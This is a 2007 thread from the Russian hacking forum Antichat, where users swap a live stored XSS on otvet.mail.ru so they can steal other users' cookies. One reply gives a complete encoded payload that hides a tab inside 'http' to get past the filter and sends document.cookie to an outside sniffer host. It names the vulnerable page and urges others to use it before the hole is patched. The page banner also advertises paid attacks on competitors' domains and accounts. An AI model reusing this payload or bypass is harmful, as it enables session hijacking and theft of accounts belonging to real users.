Активная XSS на otvet.mail.ru!!!

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Активная XSS на otvet.mail.ru!!!

Опции темы

Поиск в этой теме

Опции просмотра

Активная XSS на otvet.mail.ru!!!

11.01.2007, 11:42

DesignerMix

Познающий

Регистрация: 10.01.2007

Сообщений: 35

С нами: 10175402

Репутация: 34

Активная XSS на otvet.mail.ru!!!

Народ!!! Я нашёл XSS на otvet.mail.ru, но для её правильной работы ваша помошь нужна. Вот в чём вся суть, когда в вопрос (ответ) на этом сервисе вставляеш

Код:

%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

то это работает, но как только я хочу спереть чужие плюшки, то мэил фильтрует ссылку на сайт на котором стоит снифак. И как только я её (ссылку) не мучал, и переводил в разные кодировки и делал свой снифе вставлял код в ответ

Код:

<scriptsrc="http://www.naxodka.net/cookie.js"></script>

. Всё равно фильтрует гад, вот результат фильтрации

Код:

<script>location.href="<noindex><a target=_blank rel=nofollow href="http://ccl.whiteacid.org/log.php?182292">http://ccl.whiteacid.org/log.php?182292"...</a></noindex></script>

. По моему эта тема интерестна всем, так давайте её раскрутим, а?!!!

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось DesignerMix; 11.01.2007 в 12:18..

11.01.2007, 13:11

InferNo23

Участник форума

Регистрация: 05.09.2006

Сообщений: 187

С нами: 10358246

Репутация: 378

Ура!=)
тоже сначала кодировал в разные кодировки результата 0.

достачно было поставить табуляцию между ht и tp

вот весь код:

Код:

%3Cscript%3Eimg %3D new Image%28%29%3B img.src %3D %22ht%09tp%3A%2F%2Fold.antichat.ru%2Fcgi-bin%2Fs.jpg%3F%22+document.cookie%3B%3C%2Fscript%3E

страница с xss:
http://otvet.mail.ru/question/2334480/

юзаем пока не прикрыли=\

11.01.2007, 17:35

Z@P@DL0

Новичок

Регистрация: 11.01.2007

Сообщений: 1

С нами: 10173740

Репутация: 0

Цитата:

Сообщение от InferNo23

Код:

%3Cscript%3Eimg %3D new Image%28%29%3B img.src %3D %22ht%09tp%3A%2F%2Fold.antichat.ru%2Fcgi-bin%2Fs.jpg%3F%22+document.cookie%3B%3C%2Fscript%3E

страница с xss:
http://otvet.mail.ru/question/2334480/

юзаем пока не прикрыли=\

Спасибо! Давно искал рабочию!

11.01.2007, 21:07

DesignerMix

Познающий

Регистрация: 10.01.2007

Сообщений: 35

С нами: 10175402

Репутация: 34

Всё лафа кончилась...прикрыли уязвимость, но кого это пугает??? Будем новые искать =).

11.01.2007, 21:09

Rebz

Флудер

Регистрация: 08.11.2004

Сообщений: 3,395

С нами: 11317286

Репутация: 3876

быстро ж они прикрывают..
пользуяюсь случаем, хочу передать привет сотрудникам Mail.Ru! =)

11.01.2007, 21:20

~~tclover~~

Banned

Регистрация: 13.12.2005

Сообщений: 1,091

С нами: 10741286

Репутация: 1847

Цитата:

Сообщение от Rebz

быстро ж они прикрывают..
пользуяюсь случаем, хочу передать привет сотрудникам Mail.Ru! =)

ага, Андрюша, привет )

11.01.2007, 22:32

Abra

Постоянный

Регистрация: 17.09.2005

Сообщений: 375

С нами: 10866583

Репутация: 175

Rebz да тут им делать нечего, просто написали в открытую про активную ксску, ну и куча придурков сразу полезла ее непрекрыто вставлять везде где тока можно. Там уж админы не полные дураки. только на половину...

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
Маленькая активная XSS в Infinity GB v2.0 stable	_kREveDKo_	Уязвимости CMS / форумов	0	31.07.2006 23:04

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход